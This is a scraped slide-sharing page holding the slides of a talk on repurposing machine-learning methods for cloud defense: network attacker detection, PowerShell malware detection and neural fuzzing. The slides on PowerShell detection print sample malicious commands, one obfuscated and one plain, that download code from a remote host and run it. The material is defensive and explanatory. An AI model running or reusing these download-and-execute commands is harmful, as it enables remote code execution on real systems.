AI for Cybersecurity InnovationPete Burnap
 
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyFinding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyDevOps.com
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Neelu Tripathy
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalPriyanka Aash
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Creating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationCreating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationRaffael Marty
 
Secure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaSecure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaJoona Immonen
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamPriyanka Aash
 
Spark Streaming Early Warning Use Case
Spark Streaming Early Warning Use CaseSpark Streaming Early Warning Use Case
Spark Streaming Early Warning Use Caserandom_chance
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Barry Greene
 
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresAdvanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresIvo Andreev
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 

Ähnlich wie Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense (20)

Advances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defenseAdvances in cloud scale machine learning for cyber-defense
Advances in cloud scale machine learning for cyber-defense
 
Intelligent Monitoring
Intelligent MonitoringIntelligent Monitoring
Intelligent Monitoring
 
Presentation1.pptx
Presentation1.pptxPresentation1.pptx
Presentation1.pptx
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
 
Accelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPUAccelerating Cyber Threat Detection With GPU
Accelerating Cyber Threat Detection With GPU
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
AI for Cybersecurity Innovation
AI for Cybersecurity InnovationAI for Cybersecurity Innovation
AI for Cybersecurity Innovation
 
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case StudyFinding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
Finding Zero-Days Before The Attackers: A Fortune 500 Red Team Case Study
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
 
Cybersecurity - Jim Butterworth
Cybersecurity - Jim ButterworthCybersecurity - Jim Butterworth
Cybersecurity - Jim Butterworth
 
Making Threat Intelligence Actionable Final
Making Threat Intelligence Actionable FinalMaking Threat Intelligence Actionable Final
Making Threat Intelligence Actionable Final
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Creating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & VisualizationCreating Your Own Threat Intel Through Hunting & Visualization
Creating Your Own Threat Intel Through Hunting & Visualization
 
Secure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer SolitaSecure development in .NET with EPiServer Solita
Secure development in .NET with EPiServer Solita
 
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber TeamKeeping Up with the Adversary: Creating a Threat-Based Cyber Team
Keeping Up with the Adversary: Creating a Threat-Based Cyber Team
 
Spark Streaming Early Warning Use Case
Spark Streaming Early Warning Use CaseSpark Streaming Early Warning Use Case
Spark Streaming Early Warning Use Case
 
Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1Sp Security 101 Primer 2 1
Sp Security 101 Primer 2 1
 
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest FiresAdvanced Open IoT Platform for Prevention and Early Detection of Forest Fires
Advanced Open IoT Platform for Prevention and Early Detection of Forest Fires
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 

Mehr von Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfPriyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdfPriyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfPriyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfPriyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfPriyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldPriyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksPriyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsPriyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security GovernancePriyanka Aash
 

Mehr von Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Kürzlich hochgeladen

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 

Kürzlich hochgeladen (20)

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 

Transfer Learning: Repurposing ML Algorithms from Different Domains to Cloud Defense

  • 1. SESSION ID: #RSAC Mark Russinovich TRANSFER LEARNING: REPURPOSING ML ALGORITHMS FROM DIFFERENT DOMAINS TO CLOUD DEFENSE CSV-W02 CTO, Microsoft Azure Microsoft @markrussinovich
  • 2. #RSAC Leveraging intelligence across product lines SQL Server + R Microsoft R Server Hadoop + R Spark + R Azure Machine Learning Cortana Intelligence Suite R Tools/Python Tools for Visual Studio Azure Notebooks (JuPyTer) Cognitive Services Bot Framework Cortana Office 365 Bing SkypeHoloLens R Server Microsoft CNTK Xbox 360 Dynamics 365
  • 3. #RSAC Microsoft’s cloud security scale - Daily numbers 500 Million Number of active Microsoft account users 18 Billion Microsoft Account authentications 77 Million Threats detected on devices 30 Million Geo Login Anomaly Attacks deflected 1.5 Million Number of compromise attempts deflected
  • 5. #RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
  • 6. #RSAC Textbook ML development Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions
  • 7. #RSAC Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Fact | Industry grade ML solutions are highly exploratory Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Choosing the Learning Task Defining Data Input Applying Data Transforms Choosing the Learner Choosing Output Choosing Run Options View Results Debug and Visualize Errors Analyze Model Predictions Attempt 1 Attempt 2 Attempt 3 Attempt 4 Attempt n
  • 8. #RSAC Product Managers Machine Learning Experts Security Experts Assess security landscape and identify monitoring opportunities Update solution based on customer feedback Gather customer feedback and improve product Compliance and Privacy Ops Engineers Engineers Engineer for low latency, high throughput and scale Monitor performance and mitigate, resolve, preempt outages Ensure solution is compliant to privacy laws Fact | Industry grade security data science requires multiple experts
  • 10. #RSAC Traditional versus Transfer learning Learning system Learning system Learning system Different tasks Traditional Machine Learning Transfer Learning Source tasks Learning system Target task Source: Pan, Sinno Jialin, and Qiang Yang. "A survey on transfer learning." IEEE Transactions on knowledge and data engineering
  • 11. #RSAC Why transfer learning Commercial success Time 2016 Supervised learning Transfer learning Unsupervised learning Reinforcement learning Drivers of ML success in industry Source: Ruder, Sebastian, “Transfer Learning - Machine Learning's Next Frontier
  • 12. #RSAC Problem Build a generic approach to detecting malicious incoming network activity that works for all protocols Hypothesis Underlying network protocols, though different, have similar behavior Solution Detect Attacker IPs using Ensemble Tree Learning Previous No previous approach for generic protocol suspicious activity for Cloud VM Case Study 1 | Detecting malicious network activity in Azure Core Concept: Achieve transfer learning by grouping similar tasks
  • 13. #RSAC Ensemble Tree Learning applications at Microsoft
  • 14. #RSAC To get labels compare Input data Description Number of outgoing SYN in short interactions (log) Number of outgoing SYN in short interactions Total percent outgoing SYN Percent outgoing SYN in short interactions Number of incoming FIN Distinct incoming connections relative to total flows Frequency of top most used port Hourly standard deviation of destination IPs Percent of outgoing SYN in long interactions (log) Number of outgoing SYN Number of flows on low frequency (rare) ports Percent of outgoing FIN messages Ratio of outgoing to incoming flows (TCP) Ratio of outgoing to incoming flows (total) Total number outgoing SYN Features extractedIPFix data from Azure VMs IP address in the IPFix data: 10.2.3.40 3rd party threat intelligence feeds Cyber Defense Operation Threat Intelligence Center MSRC Previous Red team activities If an IP from IPFix data is also present in TI feeds, label flow as malicious
  • 15. #RSAC Tree Ensembles – Algorithm Create subsets from the training data by randomly sampling with replacement Nexamples M features
  • 16. #RSAC Tree Ensembles – Training Rare Ports Flows Number of Outgoing SYN Frequency of Top Port Number of Incoming Flows Standard Deviation of IPs Number of Incoming FIN Malicious MaliciousBenign MaliciousBenign MaliciousBenign Nexamples M features
  • 17. #RSAC Tree Ensembles – Training Standard Deviation of IPs Number of Outgoing SYN Frequency of Top Port Number of Incoming FIN Malicious MaliciousBenign Benign Benign Nexamples M features
  • 19. #RSAC Take the majority vote of the ensemble New Record Tree Ensembles – Testing Malicious Benign Benign Src Ip Dst IP Src Port DST Port In Int Out Int DSCP Octets 10.1.1.5 10.2.2.8 2887 80 Eth0 Eth1 00 982
  • 20. #RSAC Model performance and productization Model trained at regular intervals Size of data: 3GB/hour Communication with 5 Million different IPs per hour Completed within seconds Classification runs multiple times a day Completed within milliseconds Dataset True positive rate False positive rate Non Ensemble Learning 82% 0.06% Ensemble Learning 85% 0.06% Azure Security Center3 points improvement
  • 21. #RSAC Bonus Classifier can be used as an effective canary for emerging attacks #ofdetectedsuspiciousMongoDBscans http://www.zdnet.com/article/mongodb-ransacked-now-27000-databases-hit-in-mass-ransom-attacks/ Time (days)
  • 22. #RSAC WannaCry Attack Timeline 1. Prior to the MS017-10 patch release, the SMB (port 445) scanning activity in Azure behaved per the standard baseline – i.e. sporadic incoming scans 2. Once released, we can notice a gradual increase in the number of successful scans (i.e. target responded) due to: a. Official Microsoft patch being released – I.e. A small group of reverse engineers uncovered the bug b. Metasploit module released to the public, making it easier to discover and exploit the vulnerability c. Shadow Broker tool leaked, improving the Metasploit attack module and making it more widespread 3. A week before the attack, we can notice a sharp peak in the number of successful incoming scans over SMB – signaling a significant interest in the SMB protocol #ofdetectedsuspiciousSMBscans Any targeted attacked here? Standard SMB (445) Azure scanning activity 1 Increased SMB (445) Azure scanning activity 2 Abnormal peak in scanning 3 MS017-10 Patch released Metasploit exploit released Shadow Broker exploiter leak A week before the attack Attack started Time (days)
  • 23. #RSAC Case Study 2 | Detecting Malicious PowerShell commands Problem Statement Detect malicious PowerShell command lines Hypothesis Deep learning methods are capable of efficient and precise detection of malicious PowerShell commands Solution Collect large data set from Microsoft Defender and apply Microsoft’s Deep Learning toolkit (CNTK) for detection Previous Used machine learning (3-gram sequence modeling) Results: True positive rate = 89% Core Concept: Transposing existing security problem into an already solved problem from another domain
  • 24. #RSAC PowerShell command lines – difficult to detect &( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' )) Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t') Source: Bohannon, Daniel. “Invoke Obfuscation”, BlueHat 2016. Command line: before obfuscation Command line: after obfuscation Rules don’t work well, because too many regexes needs to be written Classical machine learning doesn’t work well, because every command line is unique No discernable pattern
  • 25. #RSAC
  • 27. #RSAC Microsoft’s Deep Learning toolkit (CNTK) applications
  • 28. #RSAC Deeper learning = representation learning Deep learning network Input layer Hidden layer 1 Hidden layer 2 Hidden layer 3 Output layer
  • 29. #RSAC Deep learning system trained for image recognition "-ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'*bs*.exe';(New-Object Net.WebClient).DownloadFile('http://*pf*.top /http/',$uytcccs);Start-Process $uytcccs" & { (get- date).ToUniversalTime().ToString('yyyy-MM- dd-HH:mm:ss.fff') } Convert PowerShell commands to images Technique overview
  • 30. #RSAC Model performance and productization 6 points improvement! Model trained in regular intervals Size of data: 400GB per day Completed within minutes Classification runs multiple times a day Completed within seconds Dataset True positive rate False positive rate Previous method 89% 0.004% Deep learning 95.7% 0.004%
  • 31. #RSAC Case Study 3 | Neural Fuzzing Problem Statement Fuzz-testing file parsers to discover security vulnerabilities Hypothesis Fuzz testing heuristics can be learned and generalized from an existing graybox fuzzer. Some control locations are more interesting to fuzz than others. Solution Insert a neural model in the fuzz/test feedback loop. Learn and generalize a strategy from an existing fuzzer (AFL), using sequence to sequence neural architectures. Augment original fuzzer with generalized strategy. Previous Blackbox fuzzing: e.g. random mutations Whitebox fuzzing: e.g. dynamic analysis Graybox fuzzing: human crafted mutation heuristics aimed at maximizing code coverage Core Concept: Transposing existing security problem into an already solved problem from another domain
